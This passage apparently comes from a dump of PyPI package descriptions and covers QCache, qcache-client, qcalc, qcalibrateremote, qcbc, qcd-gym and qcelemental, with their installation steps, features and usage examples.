data\nhas an unambiguous (well\u2026) data type that is used by QCache.EnumsTheX-QCache-typesheader can also be used to specify columns with enum types.X-QCache-types: foo=enum;bar=enumEnums are a good way to store low cardinality string columns space efficiently. They can be compared\nfor equality and inequality but currently do not have a well defined order so filtering by\nlarger than and less than is not possible for example.X-QCache-stand-in-columnsIt may be that your submitted data varies a little from dataset to dataset with respect to the columns\navailable in the dataset. You still want to be able to query the datasets in the same way and make\nsome assumptions of which columns that are available. This header lets you do that.In the below example column foo will be set to 10 in case it does not exist in the submitted data. 
bar will\nbe set to the value of the baz column if it is not submitted.This header can be used in request both for storing and querying data.X-QCache-stand-in-columns: foo=10;bar=bazQuery responsesX-QCache-unsliced-lengthThis header is added to responses and states how many rows the total filtered result was before applying\nany limits or offsets for pagination.X-QCache-unsliced-length: 8324More examplesPlease look at the tests in the project orQCache-clientfor some further examples of queries.\nThe unit tests in this project is also a good source for examples.If you still have questions don\u2019t hesitate to contact the author or write an issue!Statisticshttp://localhost:8888/qcache/statisticsA get against the above endpoint will return a JSON object containing cache statistics,\nhit & miss count, query & upload duration. Statistics are reset when querying.Data encodingJust use UTF-8 when uploading data and in queries and you\u2019ll be fine. All responses are UTF-8.\nNo other codecs are supported.Data compressionQCache supports request and response body compression with LZ4 or GZIP using standard HTTP headers.In a query request set the following header to receive a compressed response:Accept-Encoding: lz4,gzipThe response will contain the following header indicating the used encodingContent-Encoding: lz4LZ4 will always be preferred if present.The above header should also be set indicating the compression algorithm if you are\nsubmitting compressed data.Performance & dimensioningSince QCache is single thread, single process, the way to scale capacity is by adding more servers.\nIf you have 8 Gb of ram available on a 4 core machine don\u2019t start one server using all 8 Gb. Instead\nstart 4 servers with 2 Gb memory each or even 8 servers with 1 Gb each or 16 servers with 512 Mb each.\ndepending on your use case. Assign them to different ports and use a client library to do the key\nbalancing between them. That way you will have 4 - 16 times the query capacity.QCache is ideal for container deployment. Start one container running one QCache instance.Expect a memory overhead of about 20% - 30% of the configured cache size for querying and table loading.\nTo be on the safe side you should probably assume a 50% overhead. Eg. if you have 3 Gb available set the\ncache size to 2 Gb.When choosing between CSV and JSON as upload format prefer CSV as the amount of data can be large and it\u2019s\nmore compact and faster to insert than JSON.For query responses prefer JSON as the amount of data is often small and it\u2019s easier to work with than CSV.Standing on the shoulders of giantsQCache makes heavy use of the fantastic python librariesPandas,NumPyandTornado.Ideas for coming workThese may or may not be realized, it\u2019s far from sure that all of the ideas are good.Improve documentationStream data into dataframe rather than waiting for complete input, chunked HTTP upload or similar.Streaming proxy to allow clients to only know about one endpoint.Configurable URL prefix to allow being mounted at arbitrary position behind a proxy.Make it possible to execute multiple queries and return multiple responses in one request (qs=,/qs/).Allow post with data and query in one request, this will guarantee progress\nas long as the dataset fits in memory. {\u201cquery\u201d: \u2026, \u201cdataset\u201d: \u2026}Possibility to specify indexes when uploading data (how do the indexes affect size? write performance? 
read performance?)Possibility to upload files as a way to prime the cache without taking up memory.Namespaces for more diverse statistics based on namespace?Publish performance numbersOther table formats in addition to CSV and JSON?Break out all things dataframe into an own package and provide possibility to update\nand insert into dataframe based on predicate just like querying is done now.Investigate type hints for pandas categorials on enum-like values to improve storage\nlayout and filter speed. Check new import options from CSV when Pandas 0.19 is available.Support math functions as part of the where clause (see pandas expr.py/ops.py)Some kind of light weight joining? Could create dataset groups that all are allocated to\nthe same cache. Sub queries could then be used to query datasets based on data selected\nfrom other datasets in the same dataset group.ContributingWant to contribute? That\u2019s great!If you experience problems please log them on GitHub. If you want to contribute code,\nplease fork the code and submit a pull request.If you intend to implement major features or make major changes please raise an issue\nso that we can discuss it first.Running testspip install -r dev-requirements.txt\ninvoke testTLSSome tests rely on a couple of certs found undertls/. If these have expired\nthey have to be regenerated. This is done by executinggenerate_test_certs.shfrom thetlsdirectory."} +{"package": "qcache-client", "pacakge-description": "Python client library forQCache. Uses consistent hashing to distribute data over multiple nodes.Installationpip install qcache-clientDocumentationAvailable athttp://qcache-client.readthedocs.org/en/latest/.Please see the tests in test_qclient.py for examples of how to use it.ContributingWant to contribute? That\u2019s great!If you experience problems please log them on GitHub. If you want to contribute code,\nplease fork the code and submit a pull request.If you intend to implement major features or make major changes please raise an issue\nso that we can discuss it first.Running testsThe tests requires that you have docker installed since they are executed against a QCache instance running\nin a docker container.pip install -r dev-requirements.txt\ninvoke testTODOAsync interface?Changelog0.5.1 (2019-01-06)Include response content in cases of unexpected responses for easier debugging.Expose \u201ctrust_env\u201d as a client constructor parameter to improve performance.0.5.0 (2017-01-08)Support TLS client certificate verification0.4.2 (2016-12-18)Check dropped nodes also on get, not only post.Make connection stats public and resettable.0.4.1 (2016-11-11)Include content encoding in the result object.0.4.0 (2016-09-18)Support for custom headers when running queries. This allows use of the pandas filter engine\nintroduced in QCache 0.6.1.0.3.2 (2016-04-10)Support Python 3.4 and 3.5.0.3.1 (2016-01-16)Include CHANGELOG in release.0.3.0 (2015-12-23)Possible to query using POST instead of GET. 
Good for very large queries.Additional circuit breakers to avoid infinite repetition of requests in case of errors.0.2.1 (2015-12-14)SSL and basic auth supportPossible to add custom headers when posting data, type information for example0.2.0 (2015-12-06)Report the unsliced result length as part of the result, nice for pagination for exampleUse connection pooling0.1.0 (2015-10-25)First release that actually does something sensible.0.0.1 (2015-10-15)First release on PyPI."} +{"package": "qcad", "pacakge-description": "WHIKoperator - \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441 \u043a\u0430\u043c\u0435\u0440\u043e\u0439 HV \u0432 Gravity-core"} +{"package": "qcalc", "pacakge-description": "\"qcalc\" is a powerful, cross-platform calculator specifically designed for\nembedded systems programmers. The calculator accepts whole expressions in\ntheC-syntaxand displays results simultaneously in decimal, hexadecimal,\nand binary without the need to explicitly convert the result to these bases.General RequirementsThe \"qcalc\" package requires Python 3, which is included in theQTools distributionfor Windows and is typically included with other operating systems, such as\nLinux and MacOS.InstallationTheqcalc.pyscript can be used standalone,withoutany\ninstallation (see Using \"qcalc\" below).Alternatively, you caninstallqcalc.pywithpipfrom PyPi by\nexecuting the following command:pip install qcalcOr directly from the sources directory (e.g.,/qp/qtools/qcalc):python setup.py install --install-dir=/qp/qtools/qcalcUsing \"qcalc\"If you are usingqcalcas a standalone Python script, you invoke\nit from a console as follows:python /path-to-qcalc-script/qcalc.py [expression]Alternatively, if you've installedqcalcwithpip, you invoke\nit from a console as follows:qcalc [expression]Batch modeIf you provide the optional [expression] argument, qcalc will evaluate\nthe expression, print the result and terminate.Interactive modeOtherwise, if no [expression] argument is provided, qcalc will start in\nthe interactive mode, where you can enter expressions via your keyboard.FeaturesThe most important feature of \"qcalc\" is that it accepts expressions\nin theC-syntax-- with the same operands and precedence rules as\nin the C or C++ source code. Among others, the expressions can contain\nall bit-wise operators (<<,>>,|,&,^,~) as well as\nmixed decimal,hexadecimalandbinaryconstants.\n\"qcalc\" is also a powerful floating-point scientific calculator and\nsupports all mathematical functions (sin(),cos(),tan(),exp(),ln(), ...). Some examples of acceptable expressions are:((0xBEEF << 16) | 1280) & ~0xFF-- binary operators, mixed hex and decimal numbers($1011 << 24) | (1280 >> 8) ^ 0xFFF0-- mixed @ref qcalc_bin \"binary\", dec and hex numbers(1234 % 55) + 4321//33-- remainder, integer division (note the//integer division operatorpi/6-- pi-constantpow(sin(ans),2) + pow(cos(ans),2)-- scientific floating-point calculations,ans-variableNOTE\"qcalc\" internally uses the Python commandevalto evaluate the expressions.\nPlease refer to the documentation of thePython math expressionsfor more details of supported syntax and features.Automatic Conversion to Hexadecimal and BinaryIf the result of expression evaluation is integer (as opposed to floating point),\n\"qcalc\" automatically displays the result in hexadecimal and binary formats\n(see \"qcalc\" screenshot above). 
For better readability the hex display shows\nan apostrophe between the two 16-bit half-words (e.g.,0xDEAD'BEEF).\nSimilarly, the binary output shows an apostrophe between the four 8-bit\nbytes (e.g.,0b11011110'10101101'10111110'11101111).Hexadecimal and Binary NumbersAs the extension to the C-syntax, QCalc supports bothhexadecimal numbersandbinary numbers. These numbers are represented as0x...and0b...,\nrespectively, and can be mixed into expressions. Here are a few examples\nof such expressions:(0b0110011 << 14) & 0xDEADBEEF\n(0b0010 | 0b10000) * 123History of InputsAs a console application \"qcalc\" \"remembers\" the history of the recently\nentered expressions. You can recall and navigate the history of previously\nentered expressions by pressing the \"Up\" / \"Down\" keys.The ans Variable\"qcalc\" stores the result of the last computation in theansvariable.\nHere are some examples of expressions with theansvariable:1/ans-- find the inverse of the last computation@nlog(ans)/log(2)-- find log-base-2 of the last computation@n64-bit Range\"qcalc\" supports the 64-bit range and switches to 64-bit arithmetic automatically\nwhen anintegerresult of a computation exceeds the 32-bit range.\nHere are some examples of the 64-bit output:> 0xDEADBEEF << 27\n= 501427843159293952 | 0x06F5'6DF7'7800'0000\n= 0b00000110'11110101'01101101'11110111'01111000'00000000'00000000'00000000\n> 0xDEADBEEF << 24\n= 62678480394911744 | 0x00DE'ADBE'EF00'0000\n= 0b00000000'11011110'10101101'10111110'11101111'00000000'00000000'00000000\n> 0xDEADBEEF << 34\n! out of range\n>Error HandlingExpressions that you enter into \"qcalc\" might have all kinds of errors:\nsyntax errors, computation errors (e.g., division by zero), etc.\nIn all these cases, \"qcalc\" responds with theErrormessage and the\nexplanation of the error:> (2*4) + )\nTraceback (most recent call last):\n File \"C:\\qp\\qtools\\qcalc\\qcalc.py\", line 54, in _main\n result = eval(expr)\n File \"\", line 1\n (2*4) + )\n ^\nSyntaxError: unmatched ')'\n>More InformationMore information about \"qcalc\" is available online at:https://www.state-machine.com/qtools/qcalc.htmlMore information about the QTools collection is available\nonline at:https://www.state-machine.com/qtools/"} +{"package": "qcalibrateremote", "pacakge-description": "A client library for runnig a control optimization with qruise calibrate softwareNoteThe API is experimental and subject to change without a prior noticeDescriptionThe qcalibrateremote package provides interface to QCalibrate optimization service, providing algorithms helping to define optimal control for quantum system.\nThe actual optimization algorithm runs on the server, supplying the set of parameters and/or PWC pulses to client side. The client code evaluates the parameters\nby deriving and applying control signals to a system under control, performing measurement, calcualates and returns the figure of merit (infidelity) value.\nThe algorithm tries different parameters in order to find optimal values to achieve minimal infidelity. 
Live progress of optimization can be observed in the in web UI,\ngiven opportunity to finish the optimization, before the optimization stopping criteria are achieved.Currently two optimization modes are supported.pure parameter optimizationRandom chopped base PWC function optimization (Fourier and Sigmoid bases)InstallingInstall withpip:$pipinstallqcalibrateremotefor conda environment install grcpio explicitly$condainstallgrpcioUsagePrerequisitsPython 3.8+ (developed and tested with 3.8.5)Qruise Calibrate account (contactr.razilov@fz-juelich.defor details)Direct internet connection to server (may require VPN access)ExperimentExperiment defines is a set of meta-parameters controlling the optimization\nUse use API or Web UI to create an experiment and define optimization parameters. Use online help to get learn about details.\nThe evaluation of figure of merit class can be supplied as classevaluate_fom_class=..or objectevaluate_fom_object=..Pure parameter optimization example# import dependenciesfromtypingimportDictfromqcalibrateremoteimport(EvaluateFigureOfMerit,FigureOfMerit,create_optimizer_client,)# setup client connection (copy form web UI: https://www.qcalibrate.staging.optimal-control.net:31603)experiment_id=\"0xabcd\"token=(\"ey...\")optimizer_client=create_optimizer_client(host=\"grpc.qcalibrate.staging.optimal-control.net\",port=31603,token=token)# define infidelity evaluation classclassDistanceFom(EvaluateFigureOfMerit):def__init__(self,*args,**kwargs)->None:super().__init__()definfidelity(self,param1,param2)->float:return(param1-0.55)**2+(param2-0.33)**2defevaluate(self,parameters:Dict[str,float],**kwargs)->FigureOfMerit:\"\"\"Abstract method for figure of merit evaluation\"\"\"# print(parameters)returnFigureOfMerit(self.infidelity(**parameters),'')# run optimizationoptimization_result=optimizer_client.run(experiment_id=experiment_id,evaluate_fom_class=DistanceFom)# best fitting parametersoptimization_result.top[0].parametersRather than create a completely new configuration, one can update an existing experiment configurationwithoptimizer_client.update_experiment(experiment_id)asexperiment_builder:withexperiment_builder.configuration()asconfiguration:withconfiguration.parameter(\"param1\")asparam1:param1.initial_value=0.7optimization_result=optimizer_client.run(experiment_id=experiment_id,evaluate_fom_class=DistanceFom)# best fitting parametersoptimization_result.top[0].parametersPulse optimization example# import dependenciesfromtypingimportDictfromqcalibrateremoteimport(EvaluateFigureOfMerit,FigureOfMerit,create_optimizer_client,Pulse,)# setup client connection (copy form web UI: https://www.qcalibrate.staging.optimal-control.net:31603)token=(\"ey...\")optimizer_client=create_optimizer_client(host=\"grpc.qcalibrate.staging.optimal-control.net\",port=31603,token=token)experiment_builder=optimizer_client.create_pulse_optimization_experiment(\"Pulse optimization\",\"Created by \"+__file__)# define 
configurationwithexperiment_builder.configuration()asconfiguration:withconfiguration.time(\"time1\")astime1:time1.initial_value=1time1.optimize=Falsewithconfiguration.pulse(\"pulse1\")aspulse1:pulse1.time_name=\"time1\"pulse1.lower_limit=-1pulse1.upper_limit=1pulse1.bins_number=21withpulse1.fourier_basis()asfourier_basis:fourier_basis.basis_vector_number=5withfourier_basis.uniform_super_parameter_distribution()asuniform_super_parameter_distribution:uniform_super_parameter_distribution.lower_limit=0.01uniform_super_parameter_distribution.upper_limit=5withpulse1.initial_guess()asinitial_guess:initial_guess.function=\"lambda t: 1\"withpulse1.scaling_function()asscaling_function:scaling_function.function=\"lambda t: np.exp(-(t - 0.5)**2/(2*0.2**2))\"withconfiguration.dcrab_settings()asdcrab_settings:dcrab_settings.maximum_iterations_per_super_iteration=50dcrab_settings.super_iteration_number=6experiment_id=optimizer_client.add_experiment(experiment_builder)# define infidelity evaluation classdefexpected_pulse(t):returnnp.sin(2*np.pi*t)**4classSineFom(EvaluateFigureOfMerit):defevaluate(self,parameters:Dict[str,float],pulses:Dict[str,Pulse],**kwargs)->FigureOfMerit:pulse1=pulses[\"pulse1\"]inf=np.sum((expected_pulse(pulse1.times)-pulse1.values)**2)returnFigureOfMerit(inf,'{}')# run optimizationoptimization_result=optimizer_client.run(experiment_id=experiment_id,evaluate_fom_object=SineFom())# plot best fitting pulsepulse1=optimization_result.top[0].pulses[\"pulse1\"]importmatplotlib.pyplotaspltplt.plot(pulse1.times,expected_pulse(pulse1.times))plt.plot(pulse1.times,pulse1.values)"} +{"package": "qcam-sdk", "pacakge-description": "qcam test Packageqcam test package"} +{"package": "qcanvas", "pacakge-description": "No description available on PyPI."} +{"package": "qcarchive-step", "pacakge-description": "SEAMM QCArchive Plug-inA SEAMM plug-in for QCArchiveFree software: BSD-3-ClauseDocumentation:https://molssi-seamm.github.io/qcarchive_step/index.htmlCode:https://github.com/molssi-seamm/qcarchive_stepFeaturesPlease edit this section!AcknowledgementsThis package was created with themolssi-seamm/cookiecutter-seamm-plugintool, which\nis based on the excellentCookiecutter.Developed by the Molecular Sciences Software Institute (MolSSI),\nwhich receives funding from theNational Science Foundationunder\naward CHE-2136142.History2023.3.30 \u2013 Initial working version, with documentation.With the following functionality:Creation of QCArchive datasets from SEAMMAdding structures to entries in a datasetRetrieving structures from a QCArchive dataset back into SEAMM"} +{"package": "qcarchivetesting", "pacakge-description": "No description available on PyPI."} +{"package": "qcat", "pacakge-description": "No description available on PyPI."} +{"package": "qcaus", "pacakge-description": "No description available on PyPI."} +{"package": "qcausality", "pacakge-description": "No description available on PyPI."} +{"package": "qcb", "pacakge-description": "No description available on PyPI."} +{"package": "qcbacktester", "pacakge-description": "UNKNOWN"} +{"package": "qcbc", "pacakge-description": "qcbcqcbcis a python package to quality control synthetic barcode sequences for orthogonal sequencing-based assays such as:Perturb-SeqTAPSeq10x CRISPRCiteSeqClicktagMultiseq10x Feature BarcodingInstallationThe development version can be installed withpipinstallgit+https://github.com/pachterlab/qcbcUsageqcbcconsists of four subcommands:$ qcbc\nusage: qcbc [-h] [--verbose] ...\n\nqcbc 0.0.0: Format sequence specification 
files\n\npositional arguments:\n \n volume Compute max barcode volume\n ambiguous Find ambiguous barcodes by ec\n pdist Compute pairwise distance between barcodes\n content Compute max barcode content\n homopolymer\n Compute homopolymer distributionBarcode files are expected to contain both the barcode sequence and a name associated with the barcode, separated by a tab. For example$ cat barcodes.txt\nAGCAGTTACAG tag1\nCTTGTACCCAG tag2\n\n$ cat -t barcodes.txt \nCATGGAGGCG^Itag1\nAGCAGTTACAG^Itag2Note thatcat -t file.txtconvertsinto^Iand can be used to verify that the file is properly setup.qcbc ambiguous: find barcodes with shared subsequenceFind barcodes that share subsequences of a given length.qcbc ambiguous -l optionally,-rccan be used to check the reverse complement of the subsequences.corresponds to the subsequence length used to evaluate ambiguity between barcodes.corresponds to the barcode file.Examples# check ambiguous barcodes by subsequences of length 6$qcbcambiguous-l3barcodes.txt\nCAGtag1,tag1,tag2\nTACtag1,tag2qcbc content: compute base distributionCompute the base distribution within each barcode.qcbc content optionally, specify-- frequencyto return the base distribution fractionoptionally, specify--entropyto return the entropy of the base distribution fraction relative to the max entropy.corresponds to the barcode file.Examples$ qcbc content -e barcodes.txt\ntag1\tAGCAGTTACAG\t0.67\ntag2\tCTTGTACCCAG\t0.67qcbc homopolymer: compute homopolymer distributionFind the number of homopolymers of length two or greater.qcbc homopolymer corresponds to the barcode file.Examples$ qcbc homopolymer barcodes.txt\ntag1\tAGCAGTTACAG\t1,0,0,0,0,0,0,0,0,0\ntag2\tCTTGTACCCAG\t1,1,0,0,0,0,0,0,0,0qcbc pdist: compute pairwise distanceCompute the pairwise hamming distance between barcodes.qcbc pdist optionally,-rccan be used to check the reverse complement of the subsequences.corresponds to the barcode file.Examples$ qcbc pdist barcodes.txt\nAGCAGTTACAG\ttag1\tCTTGTACCCAG\ttag2\t8.0qcbc volume: compute size of barcode spaceCompute the fraction of barcode space occupied by the given barcodes.qcbc volume corresponds to the barcode file.Examples$ qcbc volume barcodes.txt\n2 out of 4,194,304 possible unique barcodes representing 0.0000%ContributingThank you for wanting to improveqcbc. If you have a bug that is related toqcbcplease create an issue. 
The issue should containtheqcbccommand ran,the error message, andtheqcbcand python version.If you'd like to add assays sequence specifications or make modifications to theqcbctool please do the following:Fork the project.# Press \"Fork\" at the top right of the GitHub pageClone the fork and create a branch for your featuregitclonehttps://github.com//qcbc.gitcdqcbc\ngitcheckout-bcool-new-featureMake changes, add files, and commit# make changes, add files, and commit themgitaddpath/to/file1.pypath/to/file2.py\ngitcommit-m\"I made these changes\"Push changes to GitHubgitpushorigincool-new-featureSubmit a pull requestIf you are unfamilar with pull requests, you find more information on theGitHub help page."} +{"package": "qc-benchmark-dwave", "pacakge-description": "qc_benchmarkDescriptioncaict qc multi-access benchmark platformSoftware ArchitectureSoftware architecture descriptionInstallationxxxxxxxxxxxxInstructionsxxxxxxxxxxxxContributionFork the repositoryCreate Feat_xxx branchCommit your codeCreate Pull RequestGitee FeatureYou can use Readme_XXX.md to support different languages, such as Readme_en.md, Readme_zh.mdGitee blogblog.gitee.comExplore open source projecthttps://gitee.com/exploreThe most valuable open source projectGVPThe manual of Giteehttps://gitee.com/helpThe most popular membershttps://gitee.com/gitee-stars/"} +{"package": "qcb-plotting-tools", "pacakge-description": "# QCB Plotting ToolsDescription of the project and the module qcb_plotting_tools.Note that this will be used as a project description for your code/application/library. Replace this withthe corresponding documentation.## How to BuildThe default project layout and build steps are discussed in [BUILD.md](BUILD.md). Some of the informationis related to the AICS build process.**NOTE**: You will also need to install DatasetDatabase in orderto pull data from our data repository! 
See this for further details:https://github.com/AllenCellModeling/datasetdatabase## Legal documents- [License](LICENSE.txt) _(Before you release the project publicly please check with your manager to ensure the license is appropriate and has been run through legal review as necessary.)_- [Contribution Agreement](CONTRIBUTING.md) _(Additionally update the contribution agreement to reflectthe level of contribution you are expecting, and the level of support you intend to provide.)_"} +{"package": "qcc74x-crypto-plus", "pacakge-description": "No description available on PyPI."} +{"package": "qcccrawl", "pacakge-description": "easy to use as most of the data returned are pandas DataFrame objectscan be easily saved as csv, excel or json filescan be inserted into MySQL or MongodbTarget Usersfinancial market analyst of Chinalearners of financial data analysis with pandas/NumPypeople who are interested in China financial dataInstallationpip install qcccrawlUpgradepip install qcccrawl \u2013upgradeQuick Startgn=crawl.BaiduNews()\ngn.update_info()\nprint(gn.author_wx)\ndf_search = gn.search_news('\u4e2d\u56fd\u94f6\u884c \u7535\u5b50\u94f6\u884c',day=-3, pn=None)\nprint(df_search)\ndf_search.to_excel('./search.xlsx')\ndf_detail = gn.news_detail(top=5)\nprint(df_detail)\ndf_detail.to_excel('./detail.xlsx')return:open high close low volume p_change ma5\ndate\n2012-01-11 6.880 7.380 7.060 6.880 14129.96 2.62 7.060\n2012-01-12 7.050 7.100 6.980 6.900 7895.19 -1.13 7.020\n2012-01-13 6.950 7.000 6.700 6.690 6611.87 -4.01 6.913\n2012-01-16 6.680 6.750 6.510 6.480 2941.63 -2.84 6.813\n2012-01-17 6.660 6.880 6.860 6.460 8642.57 5.38 6.822\n2012-01-18 7.000 7.300 6.890 6.880 13075.40 0.44 6.788\n2012-01-19 6.690 6.950 6.890 6.680 6117.32 0.00 6.770\n2012-01-20 6.870 7.080 7.010 6.870 6813.09 1.74 6.832"} +{"package": "qcc-news", "pacakge-description": "Docs for this project are maintained athttps://gitee.com/qcc100/qcc-news.git."} +{"package": "qccodar", "pacakge-description": "UNKNOWN"} +{"package": "qcc-product", "pacakge-description": "Docs for this project are maintained athttps://gitee.com/qcc100/qcc-product.git."} +{"package": "qcc-wallet", "pacakge-description": "Docs for this project are maintained athttps://gitee.com/qcc100/qcc-wallet.git."} +{"package": "qcd", "pacakge-description": "AuthorsMarcel R.LicenseThe MIT License (MIT)Copyright (c) 2017 Marcel R.Permission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the\n\u201cSoftware\u201d), to deal in the Software without restriction, including\nwithout limitation the rights to use, copy, modify, merge, publish,\ndistribute, sublicense, and/or sell copies of the Software, and to\npermit persons to whom the Software is furnished to do so, subject to\nthe following conditions:The above copyright notice and this permission notice shall be included\nin all copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \u201cAS IS\u201d, WITHOUT WARRANTY OF ANY KIND, EXPRESS\nOR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\nIN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY\nCLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\nTORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\nSOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE."} +{"package": "qcdevol", "pacakge-description": "Theqcdevolpackage implements the QCD evolution of\ncouplings, 
masses, and other renormalization parameters.\nUncertainties can be incorporated into parameters using\nthegvarmodule. QED effects can be included.\nThere are also tools for manipulating\nand evolving perturbation series.See theINSTALLATIONfile for installation\ndirections. Testqcdevolusingmake tests.\nFor documentation, opensrc/html/index.htmlin\na browser. Licensing information is in theLICENSEfile.Created by G. Peter Lepage (Cornell University) 2023Copyright (c) 2023 G. Peter Lepage"} +{"package": "qcd-gym", "pacakge-description": "Quantum Circuit DesignerDescriptionThis repository contains the Quantum Circuit Designer, a genericgymnasiumenvironment to build quantum circuits gate-by-gate usingpennylane, revealing current challenges regarding:State Preparation (SP): Find a gate sequence that turns some initial state into the target quantum state.Unitary Composition (UC): Find a gate sequence that constructs an arbitrary quantum operator.ObservationsThe observation is defined by the full complex vector representation of the state of the current circuit: $s = \\ket{\\boldsymbol{\\Psi}}\\in\\mathbb{C}^{2^\\eta}$.\nWhile this information is only available in quantum circuit simulators efficiently (on real hardware, $\\mathcal{O}(2^\\eta)$ measurements would be needed), it depicts a starting point for RL from which future work should extract a sufficient, efficiently obtainable, subset of information.\nThis $2^\\eta$-dimensional state representation is sufficient for the definition of an MDP-compliant environment, as operations on this state are required to be reversible.ActionsWe use a $4$-dimensionalBoxaction space $\\langle o, q, c, \\Phi \\rangle = a \\in \\mathcal{A} = {\\Gamma \\times \\Omega \\times \\Theta}$ with the following elements:NameParameterTypeDescriptionOperation$o \\in \\Gamma$intspecifying operation (see next table)Qubit$q \\in[0, \\eta)$intspecifying qubit to apply the operationControl$c \\in[0, \\eta)$intspecifying a control qubitParameter$\\Phi \\in[- \\pi,\\pi]$floatcontinuous parameterThe operations $\\Gamma$ are defined as:oOperationConditionTypeArgumentsComments0$\\mathbb{M}$Meassurement$q$Control and Parameter omitted1$\\mathbb{Z}$$q = c$PhaseShift$q,\\Phi$Control omitted1$\\mathbb{Z}$$q \\neq c$ControlledPhaseShift$q,c,\\Phi$-2$\\mathbb{X}$$q = c$X-Rotation$q,\\Phi$Control omitted2$\\mathbb{X}$$q \\neq c$CNOT$q,c$Parameter omitted3$\\mathbb{T}$TerminateAll agruments omittedWith operations according to the following unversal gate set:CNOT: $$CX_{q,c} = \\ket{0}\\bra{0}\\otimes I + \\ket{1}\\bra{1}\\otimes X$$X-Rotation: $$RX(\\Phi) = \\exp\\left(-i \\frac{\\Phi}{2} X\\right)$$PhaseShift: $$P(\\Phi) = \\exp\\left(i\\frac{\\Phi}{2}\\right) \\cdot \\exp\\left(-i\\frac{\\Phi}{2} Z\\right)$$ControlledPhaseShift: $$CP(\\Phi) = I \\otimes \\ket{0} \\bra{0} + P(\\Phi) \\otimes \\ket{1} \\bra{1}$$RewardThe reward is kept $0$ until the end of an episode is reached (either by truncation or termination).\nTo incentivize the use of few operations, a step-cost $\\mathcal{C}_t$ is applied when exceeding two-thirds of the available operations $\\sigma$:\n$$\\mathcal{C}_t=\\max\\left(0,\\frac{3}{2\\sigma}\\left(t-\\frac{\\sigma}{3}\\right)\\right)$$Suitable task reward functions $\\mathcal{R}^{}\\in[0,1]$ are defined, s.t.: $\\mathcal{R}=\\mathcal{R}^{}(s_t,a_t)-C_t$, according to the following challenges:ChallengesState PreparationThe objective of this challenge is to construct a quantum circuit that generates a desired quantum state.\nThe reward is based on 
thefidelity$\\mathcal{F} = |\\braket{\\psi_{\\text{env}}|\\psi_{\\text{target}}}|^2 \\in [0,1]$ between the target an the final state:\n$$\\mathcal{R}^{SP}(s_t,a_t) = \\begin{dcases} F(s_t, \\Psi), & \\text{if $t$ is terminal.} \\0, & \\text{otherwise.} \\end{dcases}$$\nCurrently, the following states are defined:'SP-random'(a random state overmax_qubits)'SP-bell'(the 2-qubit Bell state)'SP-ghz'(thequbit GHZ state)Unitary CompositionThe objective of this challenge is to construct a quantum circuit that implements a desired unitary operation.\nThe reward is based on theFrobenius norm$D = |U - V(\\Sigma_t)|_2$ between the taget unitary $U$ and the final unitary $V$ based on the sequence of operations $\\Sigma_t = \\langle a_0, \\dots, a_t \\rangle$:$$ R^{UC}(s_t,a_t) = \\begin{dcases} 1 - \\arctan (D), & \\text{if $t$ is terminal.} \\0, & \\text{otherwise.} \\end{dcases}$$The following unitaries are currently available for this challenge:'UC-random'(a random unitary operation onmax_qubits)'UC-hadamard'(the single qubit Hadamard gate)'UC-toffoli'(the 3-qubit Toffoli gate)SeeOutlookfor more challenges to come.Further ObjectivesThe goal of this implementation is to not only construct any circuit that fulfills a specific challenge but to also make this circuit optimal, that is to give the environment further objectives, such as optimizing:Circuit DepthQubit CountGate Count (or: 2-qubit Gate Count)Parameter CountQubit-ConnectivityThese circuit optimization objectives can be switched on by the parameterpunishwhen initializing a new environment.Currently, the only further objective implemented in this environment is thecircuit depth, as this is one of the most important features to restrict for NISQ (noisy, intermediate-scale, quantum) devices. This metric already includes gate count and parameter count to some extent. 
However, further objectives can easily be added within theRewardclass of this environment (seeOutlook).SetupInstall the quantum circuit designer environmentpipinstallqcd-gymThe environment can be set up as:importgymnasiumasgymenv=gym.make(\"CircuitDesigner-v0\",max_qubits=2,max_depth=10,challenge='SP-bell',render_mode='text',verbose=True)observation,info=env.reset(seed=42);env.action_space.seed(42)for_inrange(9):action=env.action_space.sample()# this is where you would insert your policyobservation,reward,terminated,truncated,info=env.step(action)ifterminatedortruncated:observation,info=env.reset()env.close()The relevant parameters for setting up the environment are:ParameterTypeExplanationmax_qubits $\\eta$intmaximal number of qubits availablemax_depth $\\delta$intmaximal circuit depth allowed (= truncation criterion)challengestrRL challenge for which the circuit is to be built (seeChallenges)punishboolspecifier for turning on multi-objectives (seeFurther Objectives)Running benchmarksRunning benchmark experiments requires a full installation including baseline algorithms extendingstable_baselines3and a plotting framework extendingplotly:\nThis can be achieved by:gitclonehttps://github.com/philippaltmann/QCD.git\npipinstall-e'.[all]'Specify the intended as: \"challenge-qmax_qubits-dmax_depth\":# Run a specific algoritm and challenge (requires `pip install -e '.[train]'`)python-mtrain[A2C|PPO|SAC|TD3]-e# Generate plots from the `results` folder (requires `pip install -e '.[plot]'`)python-mplotresults# To train the provided baseline algorithms, use (pip install -e .[all])./run# Test the circuit designer (requires `pip install -e '.[test]'`)python-mcircuit_designer.test"} +{"package": "qcedu", "pacakge-description": "No description available on PyPI."} +{"package": "qcelemental", "pacakge-description": "QCElementalDocumentation:GitHub PagesCore data structures for Quantum Chemistry. QCElemental also contains physical constants and periodic table data from NIST and molecule handlers.Periodic Table and Physical Constants data are pulled from NIST srd144 and srd121, respectively (details) in a renewable manner (class around NIST-published JSON file).This project also contains a generator, validator, and translator forMolecule QCSchema.\u2728 Getting StartedInstallation. 
